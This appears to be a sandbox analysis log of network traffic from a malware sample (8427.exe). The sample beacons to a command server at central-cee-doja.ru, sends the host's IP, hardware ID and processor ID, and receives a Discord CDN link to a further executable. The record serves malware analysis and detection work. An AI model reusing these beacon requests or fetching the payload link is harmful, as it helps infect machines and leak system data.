2023-11-18 09:03:28 UTC	10700	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o1JGKO%2FeImWdze36Iml1EJEslAnr6R%2BDyEzQmG7S9CglWpN1j1rnauJays%2BnKbtgdvjYshUgw6j4M%2F%2BQe53%2Fkh1x4Dr1YuHs0YKLxhJE7d6yhJ0Je3byBGgwudNskvcYlUpp25SF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a5a0ad2c495-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:28 UTC	10701	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:28 UTC	10701	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	104.21.89.193	443	192.168.2.4	49845	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:28 UTC	10700	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:28 UTC	10700	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o1JGKO%2FeImWdze36Iml1EJEslAnr6R%2BDyEzQmG7S9CglWpN1j1rnauJays%2BnKbtgdvjYshUgw6j4M%2F%2BQe53%2Fkh1x4Dr1YuHs0YKLxhJE7d6yhJ0Je3byBGgwudNskvcYlUpp25SF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a5a0ad2c495-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:28 UTC	10701	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:28 UTC	10701	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	104.21.89.193	443	192.168.2.4	49846	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:29 UTC	10701	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:30 UTC	10701	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pi16I%2FEFi3yj5jcX7LkSLHNVjlKRUDHntlNqV0dugK0nzs0lbw5MvHHhGrXWxCF4sZtMK2UNKuQTQQY1CYzJSNN1gcT3B2SXBYcDJ2UV3uFbuE%2BI290hpCNODmz74tOULmnDRCli"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a61ed2e283e-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:30 UTC	10702	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:30 UTC	10702	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.4	49846	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:29 UTC	10701	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:30 UTC	10701	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pi16I%2FEFi3yj5jcX7LkSLHNVjlKRUDHntlNqV0dugK0nzs0lbw5MvHHhGrXWxCF4sZtMK2UNKuQTQQY1CYzJSNN1gcT3B2SXBYcDJ2UV3uFbuE%2BI290hpCNODmz74tOULmnDRCli"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a61ed2e283e-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:30 UTC	10702	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:30 UTC	10702	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	104.21.89.193	443	192.168.2.4	49847	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:30 UTC	10702	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:31 UTC	10702	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nMAo5JIDOTEAlYQ36PJy8cZ0zUYddM7LRUx233FE3YWNBQxTvio64S5eyqLmtwQNyvn2iydBV8IwStfFjqGWkdYkcOoYu2q02m9%2BeOGQtFLNd7NE%2FeYdBXSnTUdxxBnQyrS9uoSQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a687d2dec1b-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:31 UTC	10702	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:31 UTC	10703	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.4	49847	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:30 UTC	10702	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:31 UTC	10702	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nMAo5JIDOTEAlYQ36PJy8cZ0zUYddM7LRUx233FE3YWNBQxTvio64S5eyqLmtwQNyvn2iydBV8IwStfFjqGWkdYkcOoYu2q02m9%2BeOGQtFLNd7NE%2FeYdBXSnTUdxxBnQyrS9uoSQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a687d2dec1b-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:31 UTC	10702	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:31 UTC	10703	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	104.21.89.193	443	192.168.2.4	49848	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:31 UTC	10703	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:32 UTC	10703	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Um0coIpg%2BG%2BaI0m4%2BdAG6OqC50UCtPhchqrRBCC8NTMcUnnYJQV12LSomrh2240IYBI59G7aY04EhIM5Q5dfYGgql2CGeKLI2iQXk8%2BxBOav%2B3xJe9nwZNUVGLODKWLFOD6c0tR9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a706befeb83-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:32 UTC	10703	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:32 UTC	10703	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.4	49848	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:31 UTC	10703	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:32 UTC	10703	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Um0coIpg%2BG%2BaI0m4%2BdAG6OqC50UCtPhchqrRBCC8NTMcUnnYJQV12LSomrh2240IYBI59G7aY04EhIM5Q5dfYGgql2CGeKLI2iQXk8%2BxBOav%2B3xJe9nwZNUVGLODKWLFOD6c0tR9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a706befeb83-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:32 UTC	10703	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:32 UTC	10703	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.4	49849	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:32 UTC	10703	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:33 UTC	10703	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DFIkIaqNxYKVwCSNSNIWADIo2ZdmN%2BBds%2BlRLvm5EijCh%2FM7Qinsxk7XqSkAw0Icao%2FqFNanXw0x6YSW9jVw3Dg4RBbpIP21b9xqyHKxn%2F0wSVQevqho8gXSRpvwWbYwwY7NurJZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a76f8acc5bc-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:33 UTC	10704	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:33 UTC	10704	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	104.21.89.193	443	192.168.2.4	49849	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:32 UTC	10703	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:33 UTC	10703	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DFIkIaqNxYKVwCSNSNIWADIo2ZdmN%2BBds%2BlRLvm5EijCh%2FM7Qinsxk7XqSkAw0Icao%2FqFNanXw0x6YSW9jVw3Dg4RBbpIP21b9xqyHKxn%2F0wSVQevqho8gXSRpvwWbYwwY7NurJZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a76f8acc5bc-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:33 UTC	10704	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:33 UTC	10704	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	104.21.89.193	443	192.168.2.4	49850	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:33 UTC	10704	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:34 UTC	10704	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cm1sgEXrICdeLdiKpEHUfg7YwIf6uWLR8U3SpRTAsugPbAruzWLJNb6giKWyXKlAgspt%2F9j%2B3xmh%2ByNXzfy6Zf6mWQfn%2BNrcdmUQ%2FUGElFcHhGaxVv1qCYNBRpmPIUaJvuaGJ6zA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a7f1b9cc53d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:34 UTC	10705	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:34 UTC	10705	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.4	49850	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:33 UTC	10704	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:34 UTC	10704	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cm1sgEXrICdeLdiKpEHUfg7YwIf6uWLR8U3SpRTAsugPbAruzWLJNb6giKWyXKlAgspt%2F9j%2B3xmh%2ByNXzfy6Zf6mWQfn%2BNrcdmUQ%2FUGElFcHhGaxVv1qCYNBRpmPIUaJvuaGJ6zA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a7f1b9cc53d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:34 UTC	10705	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:34 UTC	10705	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	104.21.89.193	443	192.168.2.4	49852	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:35 UTC	10705	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:35 UTC	10705	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GyAf6M6%2BhPU3EXcmCQ%2FH%2FdhCFZzYo1R0acGGddJhTXQ%2BXfw2VZyeMcL0PyS5vYqM%2FPETCw2%2FZMDwmsc%2BfTBYK%2FEjioKmknIf5nDSOUhAaTfvfh5qyqrkbaRUY%2Fq%2BTmt%2Bx6Whnwrd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a85c9a9c5bf-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:35 UTC	10706	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:35 UTC	10706	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.4	49852	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:35 UTC	10705	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:35 UTC	10705	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GyAf6M6%2BhPU3EXcmCQ%2FH%2FdhCFZzYo1R0acGGddJhTXQ%2BXfw2VZyeMcL0PyS5vYqM%2FPETCw2%2FZMDwmsc%2BfTBYK%2FEjioKmknIf5nDSOUhAaTfvfh5qyqrkbaRUY%2Fq%2BTmt%2Bx6Whnwrd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a85c9a9c5bf-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:35 UTC	10706	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:35 UTC	10706	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	104.21.89.193	443	192.168.2.4	49854	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:36 UTC	10706	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:37 UTC	10706	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CQtw8toadKrLdbBl02VCFKw94aR2306qtrjzT3vdjzyrM%2FL46p7rL2Y7%2FYjPFMKXj%2BAdV96GTDDJ45b%2B3pQNvqEYgx09TCZRQBNpqZGkUnViIB1qmIaDowWpFhJ0hgKv2bJ7mAW1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a8ddf23c4b9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:37 UTC	10706	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:37 UTC	10706	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.4	49854	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:36 UTC	10706	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:37 UTC	10706	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CQtw8toadKrLdbBl02VCFKw94aR2306qtrjzT3vdjzyrM%2FL46p7rL2Y7%2FYjPFMKXj%2BAdV96GTDDJ45b%2B3pQNvqEYgx09TCZRQBNpqZGkUnViIB1qmIaDowWpFhJ0hgKv2bJ7mAW1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a8ddf23c4b9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:37 UTC	10706	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:37 UTC	10706	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.4	49856	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:37 UTC	10706	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:38 UTC	10707	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SXdT%2FCfLDj%2B2g0rzBjjVe4t%2Few3SQ9ap53%2FCjQofeyrDj9ZelLLTIxtON6%2BIkJFIHRxv%2Bs3QKUQh76ux5hWO7Fkx9qgJEiEjDovt9opaLyLSgyAt6hkxJUro5ObnQr%2BTxJtEEu8s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a95684e306a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:38 UTC	10707	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:38 UTC	10707	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	104.21.89.193	443	192.168.2.4	49856	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:37 UTC	10706	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
